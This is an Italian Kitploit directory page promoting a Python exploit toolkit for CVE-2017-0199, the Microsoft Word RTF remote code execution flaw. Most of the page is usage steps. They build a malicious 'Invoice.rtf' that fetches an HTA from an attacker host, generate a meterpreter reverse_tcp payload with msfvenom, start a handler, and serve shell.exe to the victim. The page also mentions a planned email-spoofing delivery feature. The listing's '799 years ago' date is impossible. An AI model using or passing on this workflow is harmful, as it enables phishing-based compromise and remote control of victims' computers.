Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2017-0199 — Exploit toolkit CVE-2017-0199 - v2.0 è un pratico script Python che fornisce un modo rapido ed efficace per sfruttare la RCE di Microsoft RTF. Può generare un file RTF dannoso e consegnare un payload metasploit / meterpreter / qualsiasi altro alla vittima senza alcuna configurazione complessa. | Kitploit
Strumenti/GitHubGitHub/exploit-install/cve-2017-0199
Generazione di PayloadExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlSviluppo Payload
GitHubexploit-install/cve-2017-0199

CVE-2017-0199

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

799 anni faNon ancora revisionato

Exploit toolkit CVE-2017-0199 - v2.0 è un pratico script Python che fornisce un modo rapido ed efficace per sfruttare la RCE di Microsoft RTF. Può generare un file RTF dannoso e consegnare un payload metasploit / meterpreter / qualsiasi altro alla vittima senza alcuna configurazione complessa.

Condividi

Exploit toolkit CVE-2017-0199 - v2.0

Exploit toolkit CVE-2017-0199 - v2.0 è un comodo script Python che fornisce un modo rapido ed efficace per sfruttare Microsoft RTF RCE. Può generare un file RTF malevolo e consegnare il payload metasploit / meterpreter alla vittima senza alcuna configurazione complessa.

Video tutorial

https://youtu.be/42LjG7bAvpg

Note di rilascio:

Introdotte le seguenti funzionalità nello script

root@kitploit:~
- Generare un file RTF malevolo usando il toolkit
- Eseguire il toolkit in modalità di sfruttamento come piccolo HTA + server web

Versione: Python versione 2.7.13

Rilascio futuro:

Sto lavorando sulla seguente funzionalità

root@kitploit:~
- Inviare automaticamente il file RTF malevolo generato alla vittima usando lo spoofing email
	

Esempio:

  • Passo 1: Generare un file RTF malevolo usando il comando seguente e inviarlo alla vittima

    root@kitploit:~
      Sintassi:
    
      # python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta>
    
      Esempio:
    
      # python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc
    
  • Passo 2 (Opzionale, se si utilizza un payload MSF): Generare il payload metasploit e avviare l'handler

    root@kitploit:~
      Esempio:
    
      Genera Payload:
    
      # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
    
      Avvia Handler:
    
      # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
    
  • Passo 3: Avviare il toolkit in modalità di sfruttamento per consegnare i payload

    root@kitploit:~
      Sintassi:
    
      # python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe>
    
      Esempio:
    
      # python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
    

Argomenti della riga di comando:

root@kitploit:~
# python cve-2017-0199_toolkit.py -h

Questo è un comodo toolkit per sfruttare CVE-2017-0199 (Microsoft Word RTF RCE)

Modalità:

-M gen                                          Genera solo il file RTF malevolo

     Genera file RTF malevolo:

      -w <Filename.rtf>                   Nome del file RTF malevolo (Condividi questo file con la vittima).

      -u <http://attacker.com/test.hta>   Il percorso di un file hta. Normalmente, dovrebbe essere un dominio o un indirizzo IP dove questo tool è in esecuzione.

                                             Per esempio, http://attackerip.com/test.hta (Questo URL sarà incluso nel file RTF malevolo e

                                             sarà richiesto una volta che la vittima aprirà il file RTF malevolo.
-M exp                                          Avvia la modalità di sfruttamento

     Sfruttamento:

      -p <TCP port:Default 80>            Numero di porta locale.

      -e <http://attacker.com/shell.exe>  Il percorso di un file eseguibile / shell meterpreter / payload che deve essere eseguito sul target.

      -l </tmp/shell.exe>                 Percorso locale di un file eseguibile / shell meterpreter / payload (Se il payload è ospitato localmente).

Disclaimer

Questo programma è SOLO per scopi educativi. Non usarlo senza permesso. Vale la consueta clausola di esclusione di responsabilità, specialmente il fatto che io (bhdresh) non sono responsabile per eventuali danni causati dall'uso diretto o indiretto delle informazioni o funzionalità fornite da questi programmi. L'autore o qualsiasi provider Internet NON si assume ALCUNA responsabilità per i contenuti o l'uso improprio di questi programmi o loro derivati. Usando questo programma accetti il fatto che qualsiasi danno (perdita di dati, crash di sistema, compromissione del sistema, ecc.) causato dall'uso di questi programmi non è di responsabilità di bhdresh.

Crediti

@nixawk per il campione RTF, @bhdresh

Bug, problemi, richieste di funzionalità

Ovviamente, non sono uno sviluppatore a tempo pieno, quindi aspettatevi qualche intoppo

Segnalate bug e problemi a [email protected]

Scarica lo strumento